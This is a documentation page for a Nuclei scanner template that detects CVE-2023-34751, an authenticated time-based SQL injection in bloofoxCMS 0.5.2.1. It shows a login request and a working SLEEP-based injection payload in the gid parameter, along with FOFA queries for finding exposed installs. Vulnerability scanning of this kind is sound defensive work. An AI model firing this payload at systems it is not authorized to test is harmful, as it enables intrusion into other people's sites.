bloofoxCMS v0.5.2.1 - SQL Injection
ID: CVE-2023-34751
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve2023,cve,sqli,bloofox,authenticated
Description
Section titled “Description”bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
YAML Source
Section titled “YAML Source”id: CVE-2023-34751
info: name: bloofoxCMS v0.5.2.1 - SQL Injection author: theamanrawat severity: critical description: | bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit. reference: - https://www.bloofox.com - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2023-34751 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34751 cwe-id: CWE-89 epss-score: 0.0257 epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: bloofox product: bloofoxcms fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms tags: time-based-sqli,cve2023,cve,sqli,bloofox,authenticated
http: - raw: - | POST /admin/index.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login - | @timeout: 10s POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
name=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save
matchers-condition: and matchers: - type: dsl dsl: - duration>=6 - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and# digest: 4a0a004730450220624663d284c479292bef61ffd94ba22f7defff2c05c10061171d1b8f9be91729022100ae92b3fde6b500f797c9688793251edd7058a3f2f16fed59ff674755fd805d46:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-34751.yaml"